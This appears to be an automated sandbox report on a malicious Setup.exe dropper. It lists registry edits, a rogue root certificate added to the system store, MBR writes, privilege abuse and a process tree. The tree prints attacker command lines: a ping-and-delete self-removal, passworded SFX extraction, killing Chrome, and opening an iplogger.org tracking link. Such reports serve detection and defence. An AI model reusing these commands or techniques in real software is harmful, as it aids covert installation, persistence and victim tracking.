\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 07b1f4f45712d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = f0d47a075812d701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = ba0e95075812d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\SharedCookie_MRACMigrationDone = "1" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = 70cf7a075812d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 010000004c6c303fde893d641e3daac951ffd792d42463a5527034d4cb5958c26139553e95c69494059be31ab6a9bef5d8d964c1f735671c8f5dce22a130459a2cd472d5a8956f362d4d3ac23833851d782b9cd7367a9e00f74fb60fe950 MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576 Setup.exe -
Runs .reg file with regedit 2 IoCs
pid Process 3296 regedit.exe 7600 regedit.exe -
Runs ping.exe 1 TTPs 5 IoCs
pid Process 5260 PING.EXE 4488 PING.EXE 2292 PING.EXE 2068 PING.EXE 96 PING.EXE -
Script User-Agent 6 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 742 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 415 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 434 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 531 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 614 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 693 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3828 1615014383700.exe 3828 1615014383700.exe 968 1615014388341.exe 968 1615014388341.exe 1320 1615014393950.exe 1320 1615014393950.exe 1124 23E04C4F32EF2158.tmp 1124 23E04C4F32EF2158.tmp 3564 seed.exe 3564 seed.exe 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found 2352 Process not Found -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 1948 MicrosoftEdgeCP.exe 3564 seed.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 2412 msiexec.exe Token: SeIncreaseQuotaPrivilege 2412 msiexec.exe Token: SeSecurityPrivilege 1016 msiexec.exe Token: SeCreateTokenPrivilege 2412 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2412 msiexec.exe Token: SeLockMemoryPrivilege 2412 msiexec.exe Token: SeIncreaseQuotaPrivilege 2412 msiexec.exe Token: SeMachineAccountPrivilege 2412 msiexec.exe Token: SeTcbPrivilege 2412 msiexec.exe Token: SeSecurityPrivilege 2412 msiexec.exe Token: SeTakeOwnershipPrivilege 2412 msiexec.exe Token: SeLoadDriverPrivilege 2412 msiexec.exe Token: SeSystemProfilePrivilege 2412 msiexec.exe Token: SeSystemtimePrivilege 2412 msiexec.exe Token: SeProfSingleProcessPrivilege 2412 msiexec.exe Token: SeIncBasePriorityPrivilege 2412 msiexec.exe Token: SeCreatePagefilePrivilege 2412 msiexec.exe Token: SeCreatePermanentPrivilege 2412 msiexec.exe Token: SeBackupPrivilege 2412 msiexec.exe Token: SeRestorePrivilege 2412 msiexec.exe Token: SeShutdownPrivilege 2412 msiexec.exe Token: SeDebugPrivilege 2412 msiexec.exe Token: SeAuditPrivilege 2412 msiexec.exe Token: SeSystemEnvironmentPrivilege 2412 msiexec.exe Token: SeChangeNotifyPrivilege 2412 msiexec.exe Token: SeRemoteShutdownPrivilege 2412 msiexec.exe Token: SeUndockPrivilege 2412 msiexec.exe Token: SeSyncAgentPrivilege 2412 msiexec.exe Token: SeEnableDelegationPrivilege 2412 msiexec.exe Token: SeManageVolumePrivilege 2412 msiexec.exe Token: SeImpersonatePrivilege 2412 msiexec.exe Token: SeCreateGlobalPrivilege 2412 msiexec.exe Token: SeCreateTokenPrivilege 2412 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2412 msiexec.exe Token: SeLockMemoryPrivilege 2412 msiexec.exe Token: SeIncreaseQuotaPrivilege 2412 msiexec.exe Token: SeMachineAccountPrivilege 2412 msiexec.exe Token: SeTcbPrivilege 2412 msiexec.exe Token: SeSecurityPrivilege 2412 msiexec.exe Token: SeTakeOwnershipPrivilege 2412 msiexec.exe Token: SeLoadDriverPrivilege 2412 msiexec.exe Token: SeSystemProfilePrivilege 2412 msiexec.exe Token: SeSystemtimePrivilege 2412 msiexec.exe Token: SeProfSingleProcessPrivilege 2412 msiexec.exe Token: SeIncBasePriorityPrivilege 2412 msiexec.exe Token: SeCreatePagefilePrivilege 2412 msiexec.exe Token: SeCreatePermanentPrivilege 2412 msiexec.exe Token: SeBackupPrivilege 2412 msiexec.exe Token: SeRestorePrivilege 2412 msiexec.exe Token: SeShutdownPrivilege 2412 msiexec.exe Token: SeDebugPrivilege 2412 msiexec.exe Token: SeAuditPrivilege 2412 msiexec.exe Token: SeSystemEnvironmentPrivilege 2412 msiexec.exe Token: SeChangeNotifyPrivilege 2412 msiexec.exe Token: SeRemoteShutdownPrivilege 2412 msiexec.exe Token: SeUndockPrivilege 2412 msiexec.exe Token: SeSyncAgentPrivilege 2412 msiexec.exe Token: SeEnableDelegationPrivilege 2412 msiexec.exe Token: SeManageVolumePrivilege 2412 msiexec.exe Token: SeImpersonatePrivilege 2412 msiexec.exe Token: SeCreateGlobalPrivilege 2412 msiexec.exe Token: SeCreateTokenPrivilege 2412 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2412 msiexec.exe Token: SeLockMemoryPrivilege 2412 msiexec.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2412 msiexec.exe 1124 23E04C4F32EF2158.tmp -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2076 MicrosoftEdge.exe 1948 MicrosoftEdgeCP.exe 1948 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1316 wrote to memory of 2412 1316 Setup.exe 75 PID 1316 wrote to memory of 2412 1316 Setup.exe 75 PID 1316 wrote to memory of 2412 1316 Setup.exe 75 PID 1016 wrote to memory of 4048 1016 msiexec.exe 80 PID 1016 wrote to memory of 4048 1016 msiexec.exe 80 PID 1016 wrote to memory of 4048 1016 msiexec.exe 80 PID 1316 wrote to memory of 560 1316 Setup.exe 82 PID 1316 wrote to memory of 560 1316 Setup.exe 82 PID 1316 wrote to memory of 560 1316 Setup.exe 82 PID 1316 wrote to memory of 912 1316 Setup.exe 83 PID 1316 wrote to memory of 912 1316 Setup.exe 83 PID 1316 wrote to memory of 912 1316 Setup.exe 83 PID 1316 wrote to memory of 500 1316 Setup.exe 84 PID 1316 wrote to memory of 500 1316 Setup.exe 84 PID 1316 wrote to memory of 500 1316 Setup.exe 84 PID 500 wrote to memory of 2292 500 cmd.exe 86 PID 500 wrote to memory of 2292 500 cmd.exe 86 PID 500 wrote to memory of 2292 500 cmd.exe 86 PID 912 wrote to memory of 2152 912 C0CA61A12E4C8B38.exe 87 PID 912 wrote to memory of 2152 912 C0CA61A12E4C8B38.exe 87 PID 912 wrote to memory of 2152 912 C0CA61A12E4C8B38.exe 87 PID 560 wrote to memory of 3268 560 C0CA61A12E4C8B38.exe 88 PID 560 wrote to memory of 3268 560 C0CA61A12E4C8B38.exe 88 PID 560 wrote to memory of 3268 560 C0CA61A12E4C8B38.exe 88 PID 560 wrote to memory of 3268 560 C0CA61A12E4C8B38.exe 88 PID 560 wrote to memory of 3268 560 C0CA61A12E4C8B38.exe 88 PID 560 wrote to memory of 3268 560 C0CA61A12E4C8B38.exe 88 PID 2152 wrote to memory of 1904 2152 cmd.exe 90 PID 2152 wrote to memory of 1904 2152 cmd.exe 90 PID 2152 wrote to memory of 1904 2152 cmd.exe 90 PID 560 wrote to memory of 3828 560 C0CA61A12E4C8B38.exe 91 PID 560 wrote to memory of 3828 560 C0CA61A12E4C8B38.exe 91 PID 560 wrote to memory of 3828 560 C0CA61A12E4C8B38.exe 91 PID 912 wrote to memory of 1456 912 C0CA61A12E4C8B38.exe 92 PID 912 wrote to memory of 1456 912 C0CA61A12E4C8B38.exe 92 PID 912 wrote to memory of 1456 912 C0CA61A12E4C8B38.exe 92 PID 1456 wrote to memory of 2068 1456 cmd.exe 94 PID 1456 wrote to memory of 2068 1456 cmd.exe 94 PID 1456 wrote to memory of 2068 1456 cmd.exe 94 PID 560 wrote to memory of 3672 560 C0CA61A12E4C8B38.exe 95 PID 560 wrote to memory of 3672 560 C0CA61A12E4C8B38.exe 95 PID 560 wrote to memory of 3672 560 C0CA61A12E4C8B38.exe 95 PID 560 wrote to memory of 3672 560 C0CA61A12E4C8B38.exe 95 PID 560 wrote to memory of 3672 560 C0CA61A12E4C8B38.exe 95 PID 560 wrote to memory of 3672 560 C0CA61A12E4C8B38.exe 95 PID 560 wrote to memory of 968 560 C0CA61A12E4C8B38.exe 96 PID 560 wrote to memory of 968 560 C0CA61A12E4C8B38.exe 96 PID 560 wrote to memory of 968 560 C0CA61A12E4C8B38.exe 96 PID 560 wrote to memory of 2036 560 C0CA61A12E4C8B38.exe 97 PID 560 wrote to memory of 2036 560 C0CA61A12E4C8B38.exe 97 PID 560 wrote to memory of 2036 560 C0CA61A12E4C8B38.exe 97 PID 560 wrote to memory of 2036 560 C0CA61A12E4C8B38.exe 97 PID 560 wrote to memory of 2036 560 C0CA61A12E4C8B38.exe 97 PID 560 wrote to memory of 2036 560 C0CA61A12E4C8B38.exe 97 PID 560 wrote to memory of 1320 560 C0CA61A12E4C8B38.exe 98 PID 560 wrote to memory of 1320 560 C0CA61A12E4C8B38.exe 98 PID 560 wrote to memory of 1320 560 C0CA61A12E4C8B38.exe 98 PID 560 wrote to memory of 3964 560 C0CA61A12E4C8B38.exe 99 PID 560 wrote to memory of 3964 560 C0CA61A12E4C8B38.exe 99 PID 560 wrote to memory of 3964 560 C0CA61A12E4C8B38.exe 99 PID 560 wrote to memory of 2552 560 C0CA61A12E4C8B38.exe 100 PID 560 wrote to memory of 2552 560 C0CA61A12E4C8B38.exe 100 PID 560 wrote to memory of 2552 560 C0CA61A12E4C8B38.exe 100 PID 560 wrote to memory of 508 560 C0CA61A12E4C8B38.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"1⤵
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1316 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"2⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2412
-
-
C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exeC:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 0011 installp12⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious use of WriteProcessMemory
PID:560 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵PID:3268
-
-
C:\Users\Admin\AppData\Roaming\1615014383700.exe"C:\Users\Admin\AppData\Roaming\1615014383700.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615014383700.txt"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3828
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵PID:3672
-
-
C:\Users\Admin\AppData\Roaming\1615014388341.exe"C:\Users\Admin\AppData\Roaming\1615014388341.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615014388341.txt"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:968
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵PID:2036
-
-
C:\Users\Admin\AppData\Roaming\1615014393950.exe"C:\Users\Admin\AppData\Roaming\1615014393950.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615014393950.txt"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1320
-
-
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"3⤵
- Executes dropped EXE
PID:3964
-
-
C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP3⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
PID:2552
-
-
C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exeC:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent3⤵
- Executes dropped EXE
PID:508 -
C:\Users\Admin\AppData\Local\Temp\is-0JES5.tmp\23E04C4F32EF2158.tmp"C:\Users\Admin\AppData\Local\Temp\is-0JES5.tmp\23E04C4F32EF2158.tmp" /SL5="$601A2,762308,115712,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1124 -
C:\Program Files (x86)\DTS\seed.sfx.exe"C:\Program Files (x86)\DTS\seed.sfx.exe" -pX7mdks39WE0 -s15⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2056 -
C:\Program Files (x86)\Seed Trade\Seed\seed.exe"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3564
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/14Zhe7"5⤵
- Checks computer location settings
PID:3672
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"3⤵PID:1620
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 34⤵
- Runs ping.exe
PID:96
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exeC:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 200 installp12⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious use of WriteProcessMemory
PID:912 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
PID:1904
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:1456 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 34⤵
- Runs ping.exe
PID:2068
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\Setup.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:500 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 33⤵
- Runs ping.exe
PID:2292
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9F3416E4B4F3FAD8BF0096B5C537460E C2⤵
- Loads dropped DLL
PID:4048
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2076
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:3944
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:1948
-
